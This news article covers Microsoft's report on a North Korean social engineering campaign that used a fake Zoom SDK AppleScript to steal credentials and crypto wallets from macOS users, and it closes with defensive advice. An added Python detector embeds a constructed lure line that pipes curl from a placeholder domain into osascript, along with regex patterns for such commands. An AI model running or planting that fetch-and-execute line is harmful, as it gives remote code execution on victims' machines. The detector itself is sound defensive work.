North Korean social engineering campaign targets macOS users
A MacOS-focused social engineering campaign orchestrated by North Korea-based threat actor Sapphire Sleet has been exposed by Microsoft’s Threat Intelligence Unit.
A North Korean social engineering campaign targeting macOS users tricked its victims into manually executing malicious files by impersonating a software update, leading to the theft of credentials, crypto assets and personal data, according to Microsoft’s Threat Intelligence unit, MSTIC.
In a new report published this week, MSTIC exposed the campaign – run by a threat actor tracked as Sapphire Sleet – which highlights how convincing user prompts and trusted system tools remain a highly valuable tool for attackers of all stripes. This particular campaign, said MSTIC, demonstrated some new combinations of macOS-focused techniques that, though not novel in and of themselves, come as something of a surprise from a threat actor like Sapphire Sleet.
MSTIC explained how the group is now shifting attack execution away from the exploitation of software vulnerabilities and into a “user-initiated” context. Crucially for Sapphire Sleet, this enables its attack chain to move ahead beyond the oversight of macOS’ onboard protections, like Transparency, Consent and Control (TCC), Gatekeeper, quarantine enforcement, and notarisation checks.
“Sapphire Sleet achieves a highly reliable infection chain that lowers operational friction and increases the likelihood of successful compromise – posing an elevated risk to organisations and individuals involved in cryptocurrency, digital assets, finance, and similar high‑value targets that Sapphire Sleet is known to target,” said the MSTIC team.
“After discovering the threat, Microsoft shared details of this activity with Apple as part of our responsible disclosure process.”
A danger to financial services
Backed by the isolated, reclusive and destitute regime in Pyongyang, Sapphire Sleet has been operational since about March 2020 and is suspected to have links to the rather more notorious Lazarus operation.
According to MSTIC, it specialises in targeting the financial services sector, including venture capital firms and organisations involved in blockchain and cryptocurrency. Its prime motivation is to loot its victims’ crypto wallets to generate revenue for its paymasters, and to steal intellectual property (IP) and tech secrets related to blockchain and crypto trading.
Sapphire Sleet is a North Korean state actor active since at least March 2020 that primarily targets the finance sector, including cryptocurrency, venture capital, and blockchain organizations. The primary motivation of this actor is to steal cryptocurrency wallets to generate revenue, and target technology or intellectual property related to cryptocurrency trading and blockchain platforms.
In this campaign, its playbook saw the group run fake recruitment profiles on professional networking and social media sites, through which selected targets were roped into conversations about job opportunities. ‘Successful’ candidates were then invited to a technical interview during which they were directed to install Sapphire Sleet’s malware, disguised as a software development kit (SDK) update for the Zoom videoconferencing tool.
The file, Zoom SDK Update.scpt, was a compiled AppleScript that opened by default in macOS Script Editor, a trusted Apple application that can execute arbitrary shell commands. Victims were lured into a false sense of security with large blocks of decoy upgrade instructions that mimicked a routine software update. Beneath this text, thousands of blank lines were inserted to push the malicious script beyond the immediately scrollable view – a crude but effective technique.
The script first launched a trusted Apple-signed process to reinforce the appearance of a genuine update. Following this, it executed its malicious payload, retrieving threat actor-controlled content via curl and passing it back to be run. This content also took the form of an AppleScript so that it could again launch within Script Editor to initiate delivery of the final payload – the attack orchestrator – for system reconnaissance and other operations.
Data exfiltrated by Sapphire Sleet during these attacks is known to have included Apple notes data, crypto wallet data, browser data and keychain information, and Telegram credentials and session data, among other things.
Next steps
Behind the scenes, Apple has already implemented platform-level protections to detect and block Sapphire Sleet’s infrastructure and malware, and deployed browsing protections in Safari. It has also issued new signatures to detect and block the malware associated with the campaign, which should already have been received by devices running macOS.
MSTIC advised that organisations that may be at risk of falling victim to this – or similar – campaigns should conduct user education on threats emanating from social media and external platforms, especially outreach that seems to require them to download software or virtual meeting tools, or to execute terminal commands.
Security teams may also wish to consider blocking or restricting the execution of compiled AppleScript files and unsigned Mach-O binaries downloaded from the internet. Any such files downloaded from external sources should of course be rigorously inspected and verified. It may also be wise to limit or at least audit the use of curl, particularly when piped to interpreters.
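As an added example (not code from the Microsoft report or this article), the following Python check triages a decompiled AppleScript for the two traits described above: deep blank-line padding that pushes code out of the visible area, and a `do shell script` that pipes curl into an interpreter. It assumes the script has already been rendered to text (for a compiled .scpt, macOS’s osadecompile produces this); the sample scripts, the domain and the threshold are constructed for illustration.

```python
import re

# Constructed sample resembling a decompiled lure script (not the real file):
# decoy instructions, heavy blank-line padding, then a remote fetch into osascript.
LURE_SCRIPT = (
    "-- Zoom SDK Update instructions\n"
    "-- 1. Close all Zoom windows\n"
    "-- 2. Click Run to apply the update\n"
    + "\n" * 3000
    + 'do shell script "curl -s https://update.example.invalid/p | osascript"\n'
)

# Constructed benign script for comparison: no padding, no remote fetch.
BENIGN_SCRIPT = 'display dialog "Update complete"\ndo shell script "ls -la ~/Desktop"\n'

# curl output piped straight into a shell or script interpreter.
PIPE_TO_INTERPRETER = re.compile(
    r"curl[^|\n]*\|\s*(?:osascript|sh|bash|zsh|python3?|perl)\b"
)
# Body of each do shell script "..." call, honouring escaped quotes.
SHELL_CALL = re.compile(r'do shell script\s+"((?:[^"\\]|\\.)*)"')


def longest_blank_run(text: str) -> int:
    """Length of the longest run of consecutive empty (whitespace-only) lines."""
    longest = run = 0
    for line in text.splitlines():
        run = run + 1 if line.strip() == "" else 0
        longest = max(longest, run)
    return longest


def triage_applescript(text: str, pad_threshold: int = 200) -> dict:
    """Return findings for padding and curl-to-interpreter patterns."""
    padding = longest_blank_run(text)
    shell_cmds = SHELL_CALL.findall(text)
    piped = [c for c in shell_cmds if PIPE_TO_INTERPRETER.search(c)]
    findings = []
    if padding >= pad_threshold:
        findings.append(f"blank-line padding: {padding} consecutive empty lines")
    for cmd in piped:
        findings.append(f"curl piped to interpreter: {cmd}")
    return {"suspicious": bool(findings), "padding": padding,
            "shell_commands": shell_cmds, "findings": findings}


if __name__ == "__main__":
    for name, script in (("lure", LURE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        result = triage_applescript(script)
        print(f"{name}: suspicious={result['suspicious']}")
        for finding in result["findings"]:
            print("  [!]", finding)
```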
Defenders should also monitor for unauthorised modifications to the macOS TCC database, a feature of this campaign, and audit LaunchDaemon and LaunchAgent installations.
MSTIC also advised organisations and users to be cautious when copying and pasting sensitive data related to cryptocurrency, such as wallet addresses or credentials, and to check and verify the pasted content matches the intended source, and to protect crypto wallets and rotate any browser-stored credentials.